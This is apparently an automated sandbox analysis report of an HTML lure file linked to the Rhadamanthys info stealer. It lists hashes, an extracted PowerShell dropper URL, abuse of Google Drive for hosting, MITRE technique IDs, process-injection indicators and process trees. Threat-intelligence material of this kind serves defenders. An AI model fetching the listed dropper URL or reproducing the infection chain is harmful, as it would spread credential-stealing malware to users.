rhadamanthys | 19deb2fb64f5f87160e3608268f86803ea624a5433b52e572e9392905ed0c434

Analysis

max time kernel
246s
max time network
247s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
25/03/2024, 17:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

view.html
Size

83KB
MD5

ea11b9f8283f67be10f3c70d5f5fa778
SHA1

dbcbab7679ea4f1956072f69b16279f78af1a39a
SHA256

19deb2fb64f5f87160e3608268f86803ea624a5433b52e572e9392905ed0c434
SHA512

f00ca799e88e20588dc60c26e392c3b1dfd0446cbaa128dd68a126b9ab11bdcf2181b87be040a9b3e765f9f1e301fd904e3867f33847a9d71f182b20a0991b1d
SSDEEP

1536:NbuBJO8zzNVpnLnTMxDfnr/O9DwCIM4tWR+13C:wBUgIxDab5

Score

10^/10

rhadamanthys stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://iigggkkl.monster/newdrop.bs64

Signatures

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4456 created 2416	4456	explorer.exe	43

Blocklisted process makes network request 3 IoCs

flow	pid	Process
198	1912	powershell.exe
199	1912	powershell.exe
209	5424	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
1680	gpg.exe
1228	svchost.exe

Loads dropped DLL 12 IoCs

pid	Process
2616	MsiExec.exe
2616	MsiExec.exe
2616	MsiExec.exe
2616	MsiExec.exe
2616	MsiExec.exe
2616	MsiExec.exe
1680	gpg.exe
1680	gpg.exe
1680	gpg.exe
1680	gpg.exe
1680	gpg.exe
1680	gpg.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\D:	chrome.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\F:	chrome.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
28	drive.google.com
30	drive.google.com

Drops file in System32 directory 11 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1680 set thread context of 4456	1680	gpg.exe	155

Drops file in Windows directory 15 IoCs

description	ioc	Process
File created	C:\Windows\Installer\e5a1917.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2FB2.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1975.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1ACE.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{654024B2-0767-4BCD-BC79-7CF46AF9D5A1}	msiexec.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Installer\MSI1C87.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\e5a191b.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e5a1917.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1B4C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1B9B.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1C19.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe

Program crash 3 IoCs

pid	pid_target	Process	procid_target
6048	4456	WerFault.exe	155
6140	4456	WerFault.exe	155
3356	4456	WerFault.exe	155

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133558626963579091"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings	mspaint.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings	mspaint.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings	OpenWith.exe

Suspicious behavior: EnumeratesProcesses 37 IoCs

pid	Process
4812	chrome.exe
4812	chrome.exe
6088	mspaint.exe
6088	mspaint.exe
2616	chrome.exe
2616	chrome.exe
5484	mspaint.exe
5484	mspaint.exe
2372	mspaint.exe
2372	mspaint.exe
1912	powershell.exe
1912	powershell.exe
1912	powershell.exe
2188	msiexec.exe
2188	msiexec.exe
5424	powershell.exe
5424	powershell.exe
5424	powershell.exe
5424	powershell.exe
5424	powershell.exe
5424	powershell.exe
5424	powershell.exe
5424	powershell.exe
5424	powershell.exe
5424	powershell.exe
5424	powershell.exe
5424	powershell.exe
5424	powershell.exe
5424	powershell.exe
3184	chrome.exe
3184	chrome.exe
4456	explorer.exe
4456	explorer.exe
4880	dialer.exe
4880	dialer.exe
4880	dialer.exe
4880	dialer.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3428	OpenWith.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
1216	7zG.exe
5176	msiexec.exe
3496	msiexec.exe
3496	msiexec.exe
5176	msiexec.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe

Suspicious use of SendNotifyMessage 48 IoCs

pid	Process
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe
3184	chrome.exe

Suspicious use of SetWindowsHookEx 13 IoCs

pid	Process
6088	mspaint.exe
4020	OpenWith.exe
5484	mspaint.exe
1424	OpenWith.exe
3428	OpenWith.exe
3428	OpenWith.exe
3428	OpenWith.exe
3428	OpenWith.exe
3428	OpenWith.exe
2372	mspaint.exe
2372	mspaint.exe
2372	mspaint.exe
2372	mspaint.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4812 wrote to memory of 4244	4812	chrome.exe	88
PID 4812 wrote to memory of 4244	4812	chrome.exe	88
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 4912	4812	chrome.exe	90
PID 4812 wrote to memory of 3952	4812	chrome.exe	91
PID 4812 wrote to memory of 3952	4812	chrome.exe	91
PID 4812 wrote to memory of 2020	4812	chrome.exe	92
PID 4812 wrote to memory of 2020	4812	chrome.exe	92
PID 4812 wrote to memory of 2020	4812	chrome.exe	92
PID 4812 wrote to memory of 2020	4812	chrome.exe	92
PID 4812 wrote to memory of 2020	4812	chrome.exe	92
PID 4812 wrote to memory of 2020	4812	chrome.exe	92
PID 4812 wrote to memory of 2020	4812	chrome.exe	92
PID 4812 wrote to memory of 2020	4812	chrome.exe	92
PID 4812 wrote to memory of 2020	4812	chrome.exe	92
PID 4812 wrote to memory of 2020	4812	chrome.exe	92
PID 4812 wrote to memory of 2020	4812	chrome.exe	92
PID 4812 wrote to memory of 2020	4812	chrome.exe	92
PID 4812 wrote to memory of 2020	4812	chrome.exe	92
PID 4812 wrote to memory of 2020	4812	chrome.exe	92
PID 4812 wrote to memory of 2020	4812	chrome.exe	92
PID 4812 wrote to memory of 2020	4812	chrome.exe	92
PID 4812 wrote to memory of 2020	4812	chrome.exe	92
PID 4812 wrote to memory of 2020	4812	chrome.exe	92
PID 4812 wrote to memory of 2020	4812	chrome.exe	92
PID 4812 wrote to memory of 2020	4812	chrome.exe	92
PID 4812 wrote to memory of 2020	4812	chrome.exe	92
PID 4812 wrote to memory of 2020	4812	chrome.exe	92

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2416
- C:\Windows\SysWOW64\dialer.exe
  "C:\Windows\system32\dialer.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4880

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument C:\Users\Admin\AppData\Local\Temp\view.html
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4812
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd414f9758,0x7ffd414f9768,0x7ffd414f9778
  2⤵
  PID:4244
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1700 --field-trial-handle=1928,i,8013137241484799892,14799368389227037227,131072 /prefetch:2
  2⤵
  PID:4912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1868 --field-trial-handle=1928,i,8013137241484799892,14799368389227037227,131072 /prefetch:8
  2⤵
  PID:3952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2248 --field-trial-handle=1928,i,8013137241484799892,14799368389227037227,131072 /prefetch:8
  2⤵
  PID:2020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2876 --field-trial-handle=1928,i,8013137241484799892,14799368389227037227,131072 /prefetch:1
  2⤵
  PID:380
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2884 --field-trial-handle=1928,i,8013137241484799892,14799368389227037227,131072 /prefetch:1
  2⤵
  PID:932
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4648 --field-trial-handle=1928,i,8013137241484799892,14799368389227037227,131072 /prefetch:1
  2⤵
  PID:3204
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4960 --field-trial-handle=1928,i,8013137241484799892,14799368389227037227,131072 /prefetch:1
  2⤵
  PID:916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6172 --field-trial-handle=1928,i,8013137241484799892,14799368389227037227,131072 /prefetch:8
  2⤵
  PID:4872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 --field-trial-handle=1928,i,8013137241484799892,14799368389227037227,131072 /prefetch:8
  2⤵
  PID:2364
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6104 --field-trial-handle=1928,i,8013137241484799892,14799368389227037227,131072 /prefetch:8
  2⤵
  PID:3252
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1796 --field-trial-handle=1928,i,8013137241484799892,14799368389227037227,131072 /prefetch:8
  2⤵
  PID:5580
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6420 --field-trial-handle=1928,i,8013137241484799892,14799368389227037227,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2616

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2524

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5668

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_x32_x64_installer.zip\password.jpg" /ForceBootstrapPaint3D
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:6088

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
1⤵
- Drops file in System32 directory
PID:1884

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4020

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:2324
- C:\Windows\system32\dashost.exe
  dashost.exe {440a6af0-6f22-40b2-912fc87c9ac4bfa3}
  2⤵
  PID:5464

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Documents\password.jpg" /ForceBootstrapPaint3D
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5484

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:1424

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3428
- C:\Windows\system32\mspaint.exe
